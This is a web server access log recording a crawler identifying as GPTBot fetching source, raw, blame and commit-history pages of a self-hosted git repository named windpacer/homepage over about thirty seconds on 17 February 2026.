"/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" -[17/Feb/2026:13:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" -[17/Feb/2026:13:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" [Client 74.7.227.38] [Length 10952] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" -[17/Feb/2026:13:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" [Client 74.7.227.38] [Length 15619] [Gzip 7.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" -[17/Feb/2026:13:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt" [Client 74.7.227.38] [Length 9909] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt" -[17/Feb/2026:13:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm" [Client 74.7.227.38] [Length 10091] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm" -[17/Feb/2026:13:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" [Client 74.7.227.38] [Length 12744] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" [Client 74.7.227.38] [Length 12744] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" [Client 74.7.227.38] [Length 12745] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" [Client 74.7.227.38] [Length 12747] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" -[17/Feb/2026:13:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 10128] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" -[17/Feb/2026:13:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" [Client 74.7.227.38] [Length 14756] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 10842] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" -[17/Feb/2026:13:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -[17/Feb/2026:13:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" [Client 74.7.227.38] [Length 11311] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm" -[17/Feb/2026:13:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" -[17/Feb/2026:13:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" -[17/Feb/2026:13:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" -[17/Feb/2026:13:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12766] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" -[17/Feb/2026:13:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" -[17/Feb/2026:13:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" -[17/Feb/2026:13:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services" [Client 74.7.227.38] [Length 9910] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" [Client 74.7.227.38] [Length 10565] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages" [Client 74.7.227.38] [Length 9976] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" [Client 74.7.227.38] [Length 11458] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" [Client 74.7.227.38] [Length 11483] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" [Client 74.7.227.38] [Length 11890] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" [Client 74.7.227.38] [Length 11611] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" [Client 74.7.227.38] [Length 11850] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" [Client 74.7.227.38] [Length 11265] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9898] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" -[17/Feb/2026:13:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" [Client 74.7.227.38] [Length 11669] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services" -[17/Feb/2026:13:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" -[17/Feb/2026:13:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages" -[17/Feb/2026:13:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" -[17/Feb/2026:13:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" -[17/Feb/2026:13:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" [Client 74.7.227.38] [Length 10780] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" -[17/Feb/2026:13:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" -[17/Feb/2026:13:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" [Client 74.7.227.38] [Length 10828] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" -[17/Feb/2026:13:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" [Client 74.7.227.38] [Length 11187] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" -[17/Feb/2026:13:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" [Client 74.7.227.38] [Length 10354] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" -[17/Feb/2026:13:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" [Client 74.7.227.38] [Length 10730] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" -[17/Feb/2026:13:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" -[17/Feb/2026:13:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" [Client 74.7.227.38] [Length 11210] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" -[17/Feb/2026:13:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" -[17/Feb/2026:13:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" -[17/Feb/2026:13:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" [Client 74.7.227.38] [Length 10954] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" -[17/Feb/2026:13:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" -[17/Feb/2026:13:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" -[17/Feb/2026:13:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" -[17/Feb/2026:13:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" -[17/Feb/2026:13:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" -[17/Feb/2026:13:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr 